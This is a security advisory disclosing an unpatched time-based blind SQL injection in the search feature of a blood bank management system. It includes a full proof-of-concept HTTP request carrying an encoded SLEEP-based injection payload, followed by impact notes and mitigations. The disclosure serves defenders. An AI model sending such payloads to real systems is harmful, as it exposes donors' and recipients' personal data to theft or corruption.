- BloodBank Management System: 1.0
- Vulnerability Type: SQL Injection (Time-Based Blind)
- Severity: HIGH
- Status: Unpatched
/abs.php?search=A%2B&submit=search
A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0. This vulnerability occurs in the search functionality when users query blood type availability. The search
parameter is not properly sanitized, allowing attackers to inject malicious SQL queries.
This vulnerability allows an attacker to manipulate SQL queries and execute arbitrary database commands, potentially leading to:
- Unauthorized access to sensitive data (e.g., donor or recipient information).
- Database corruption or deletion.
- Denial of Service (DoS) attacks by causing the database to execute time-consuming operations.
Since the injected payload persists through the search feature, this high-risk vulnerability could be exploited by remote attackers, leading to a significant breach of confidentiality and availability.
Below is an example of a GET request that demonstrates a time-based blind SQL injection. This payload causes the database to sleep for 5 seconds, proving the injection is successful:
GET /abs.php?search=A%2b'%20AND%20(SELECT%209622%20FROM%20(SELECT(SLEEP(5)))lCfZ)--%20lpxk%26submit%3dsearch&submit=search HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/abs.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
If the query is successful, the system will pause for 5 seconds before responding. This confirms the vulnerability and proves that the query can be manipulated to execute arbitrary SQL commands.
- Data Breach: Unauthorized access to personal information such as blood donors’ and recipients’ data.
- Service Disruption: Attackers can overload the database, causing a Denial of Service (DoS) by executing time-intensive queries.
- Data Corruption: Malicious actors can modify or delete critical data in the system.
- Input Validation & Sanitization: Use parameterized queries or prepared statements to prevent SQL injection.
- Error Handling: Ensure error messages do not reveal database information or SQL query structures.
- Rate Limiting: Implement rate limiting on search requests to prevent abuse via DoS attacks.
- Database User Privileges: Restrict the privileges of database users to minimize the impact of potential SQL injections.
- Security Audits: Regularly perform code reviews and penetration tests to identify and fix vulnerabilities.